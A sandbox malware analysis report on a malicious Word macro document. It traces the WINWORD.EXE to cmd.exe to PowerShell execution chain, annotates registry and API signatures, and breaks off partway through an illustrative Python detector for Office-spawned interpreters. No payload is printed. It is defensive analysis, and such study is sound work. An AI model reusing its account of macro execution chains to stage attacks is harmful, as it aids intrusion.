Malware Analysis Report

2024-10-16 06:28

Sample ID 240527-k365tsef4y
Target 78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118
SHA256 6d065101c82387e4d45dc8df1cd0f0c2ac088407908d4fed319a7ea10e9e17cc
Tags macro, macro_on_action, execution
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256

6d065101c82387e4d45dc8df1cd0f0c2ac088407908d4fed319a7ea10e9e17cc

Threat Level: Known bad

The file 78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

Tags macro, macro_on_action, execution

Process spawned unexpected child process

Blocklisted process makes network request

Suspicious Office macro

Office macro that triggers on suspicious action

Command and Scripting Interpreter: PowerShell

Drops file in Windows directory

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-05-27 09:08

Signatures

Office macro that triggers on suspicious action

Tags macro, macro_on_action
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Suspicious Office macro

Tags macro
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-05-27 09:08
Reported 2024-05-27 09:11
Platform win7-20240221-en
Max time kernel 117s
Max time network 123s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118.doc"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

This is the finding that matters in the behavioral run: a Word process has no legitimate reason to start cmd.exe. The command line it launched (see Processes below) is an obfuscated batch stub that decodes and runs a further stage, which is what brings up powershell.exe.

Command and Scripting Interpreter: PowerShell

Tags execution
ATT&CK T1059.001 (Command and Scripting Interpreter: PowerShell), tactic Execution.
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

The SysWOW64 path means this is the 32-bit PowerShell host, inherited from the 32-bit Office installation in Program Files (x86) through the 32-bit cmd.exe processes in between.

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

wiatrace.log is the Windows Image Acquisition (WIA) trace log; Office processes open it routinely when they load the imaging components, and a log file under C:\Windows\Debug is not a dropped payload.

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

Tags adware, spyware
Every key below points at Office's own components (WINWORD.EXE, msohtmed.exe, ONBttnIE.dll, EXCEL.EXE): this is Word re-registering itself as the Internet Explorer HTML/MHTML editor and its context-menu extensions, which it does on a clean sandbox image, and which the sandbox flags with a generic adware/spyware heuristic. It is not evidence that the sample installs adware; the macro's real activity is the cmd.exe and powershell.exe chain.
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Modifies registry class

Same picture as the Internet Explorer keys above: the htmlfile/mhtmlfile shell verbs, the .htm/.mht OpenWithList entries and the {42042206-2D85-11D3-8CFF-005004838597} icon handler all resolve to Office binaries (WINWORD.EXE, EXCEL.EXE, MSPUB.EXE, msohtmed.exe, msohevi.dll), and the command values written as raw data are UTF-16 MSI Darwin descriptors (they decode to strings beginning xb'BV5) that Office uses for installer self-repair of its file associations. This is consistent with Word maintaining its own associations rather than with the macro establishing persistence; none of these rows touches a Run key or a COM object the macro would load.
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

WINWORD.EXE registers a clipboard format listener during normal start-up and this hit appears for benign documents as well; on its own it is low signal.

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

SeDebugPrivilege is what a process needs to open handles to processes it does not own; read this together with the EnumeratesProcesses hit from the same powershell.exe.

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Word installs message hooks as part of normal operation. Both rows come from WINWORD.EXE itself, not from the macro's child processes, so this is low signal here.

Suspicious use of WriteProcessMemory

A parent writing into a child it has just created is what CreateProcess looks like to an API monitor, and WINWORD.EXE writing into splwow64.exe (the 32-bit print-driver host that Word starts) is normal. The value of these rows is the ancestry they record: WINWORD.EXE (1664) -> cmd.exe (2844) -> cmd.exe (3012) -> powershell.exe (1868), which is the macro's execution chain.
Description | Indicator | Process | Target
PID 1664 wrote to memory of 2440 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe
PID 1664 wrote to memory of 2440 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe
PID 1664 wrote to memory of 2440 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe
PID 1664 wrote to memory of 2440 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe
PID 1664 wrote to memory of 2844 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\SysWOW64\cmd.exe
PID 1664 wrote to memory of 2844 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\SysWOW64\cmd.exe
PID 1664 wrote to memory of 2844 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\SysWOW64\cmd.exe
PID 1664 wrote to memory of 2844 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 3012 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 3012 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 3012 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 3012 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 1868 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1868 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1868 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1868 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
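The signatures above reduce to one ancestry: WINWORD.EXE (PID 1664) started cmd.exe (2844), which started a second cmd.exe (3012), which started powershell.exe (1868). The sandbox rule that fired ("Parent WINWORD.EXE is not expected to spawn this process") looks one level up only; on an endpoint the same finding is more robust when the whole ancestry is checked, because the interpreter that matters may sit several levels below the Office process. The Python below is an added example, not the sandbox's detection logic: it rebuilds the process tree from constructed process-creation events (pid, ppid, image, the shape of Sysmon Event ID 1, with PIDs modelled on this report) and flags interpreters that have an Office ancestor at any depth next to the one-level rule. The Office, interpreter and allow lists are my assumptions, not anything the report states.

```python
from collections import namedtuple

# Constructed process-creation events (Sysmon Event ID 1 reduced to pid/ppid/image),
# modelled on the PIDs this report lists; they are not sandbox output.
Event = namedtuple("Event", "pid ppid image")
EVENTS = [
    Event(1664, 1200, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"),
    Event(2440, 1664, r"C:\Windows\splwow64.exe"),
    Event(2844, 1664, r"C:\Windows\SysWOW64\cmd.exe"),
    Event(3012, 2844, r"C:\Windows\SysWOW64\cmd.exe"),
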